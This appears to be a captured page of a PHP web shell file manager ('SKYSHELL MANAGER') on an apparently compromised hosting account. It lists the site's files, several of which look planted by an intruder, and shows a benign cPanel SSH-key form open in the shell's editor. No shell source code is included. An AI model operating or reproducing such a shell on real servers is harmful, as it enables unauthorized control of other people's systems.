📁
SKYSHELL MANAGER
PHP v8.2.30
Create
Create
Path:
root
/
home
/
qooetu
/
costes.qooetu.com
/
Name
Size
Perm
Actions
📁
.well-known
-
0755
🗑️
🏷️
🔒
📁
2e19d9
-
0755
🗑️
🏷️
🔒
📁
6b114
-
0755
🗑️
🏷️
🔒
📁
Modules
-
0755
🗑️
🏷️
🔒
📁
app
-
0755
🗑️
🏷️
🔒
📁
assets
-
0755
🗑️
🏷️
🔒
📁
bootstrap
-
0755
🗑️
🏷️
🔒
📁
cgi-bin
-
0755
🗑️
🏷️
🔒
📁
config
-
0755
🗑️
🏷️
🔒
📁
css
-
0755
🗑️
🏷️
🔒
📁
database
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
nbproject
-
0755
🗑️
🏷️
🔒
📁
public
-
0755
🗑️
🏷️
🔒
📁
resources
-
0755
🗑️
🏷️
🔒
📁
routes
-
0755
🗑️
🏷️
🔒
📁
storage
-
0755
🗑️
🏷️
🔒
📁
tests
-
0755
🗑️
🏷️
🔒
📁
uploads
-
0755
🗑️
🏷️
🔒
📁
vendor
-
0755
🗑️
🏷️
🔒
📁
wp-admin
-
0755
🗑️
🏷️
🔒
📁
wp-content
-
0755
🗑️
🏷️
🔒
📁
wp-includes
-
0755
🗑️
🏷️
🔒
📄
.htaccess
0.23 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
COOKIE.txt
0.2 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
X7ROOT.txt
0.27 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
defaults.php
1.29 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
engine.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
813.08 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
features.php
11.28 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
googlecfb82e09419fc0f6.html
0.05 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php0
1.56 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
inputs.php
0.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
kurd.html
1.07 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
library.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
min.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
p.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
php.ini
0.04 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
product.php
1.78 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
qpmwztts.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
robots.txt
0.32 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
tovmbkwh.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
tyyffovi.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
veoxv.html
1.23 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: ssh_addkey
<script type="text/javascript"> //<![CDATA[ var REQUIRED_PASSWORD_STRENGTH = %minpwstrength% || -1; var init_validation = function() { var password_validators = CPANEL.password.setup("password", "password2", "password_strength", REQUIRED_PASSWORD_STRENGTH, "create_strong_password", "why_strong_passwords_link", "why_strong_passwords_text", 0); CPANEL.validate.attach_to_form("submit_password", password_validators); }; YAHOO.util.Event.onDOMReady(init_validation); //]]> </script> <form action="ssh_doaddkey"> <!-- prevent password autofill --> <input type="text" style="display:none"> <input type="password" autocomplete='off' style="display:none"> <table cellpadding="5" cellspacing="1"> <tr> <td align="right">Key Name (defaults to id_rsa):</td> <td><input type="text" size="20" name="name" /></td> <td> </td> </tr> <tr> <td align="right">Key Password:</td> <td><input type="password" iautocomplete='off' maxlength="128" style="width: 150px" name="pass" id="password" /></td> <td><div id="password_error"></div></td> </tr> <tr> <td align="right">Password (again):</td> <td><input id="password2" name="password2" type="password" autocomplete='off' style="width: 150px" maxlength="128" /></td> <td><div id="password2_error"></div></td> </tr> <tr> <td align="right">Password Strength (<div style="display: inline" id="why_strong_passwords_link" class="action_link">why?</div>):</td> <td><div id="password_strength" style="width: 150px; height: 20px; border: 1px solid black; margin: 5px 0px 3px 0px"></div></td> <td><input type="button" id="create_strong_password" value="Password Generator" tabindex="-1" class="btn-secondary" /></td> </tr> <tr> <td align="right">Key Type:</td> <td> <select name="type"> <option value="dsa">DSA</option> <option value="RSA" selected>RSA</option> </select> </td> <td> </td> </tr> <tr> <td align="right">Key Size:</td> <td> <select name="keysize"> <option value="1024">1024</option> <option value="2048" selected>2048</option> <option value="4096">4096</option> </select> </td> <td> </td> </tr> <tr> <td></td> <td><input type="submit" id="submit_password" value="Generate Key" class="btn-primary" /></td> <td></td> </tr> </table> </form> <div id="why_strong_passwords_text" style="display: none"> %email_password_why% <br /><br /> %email_password_tip% </div> <br /> <br />
Save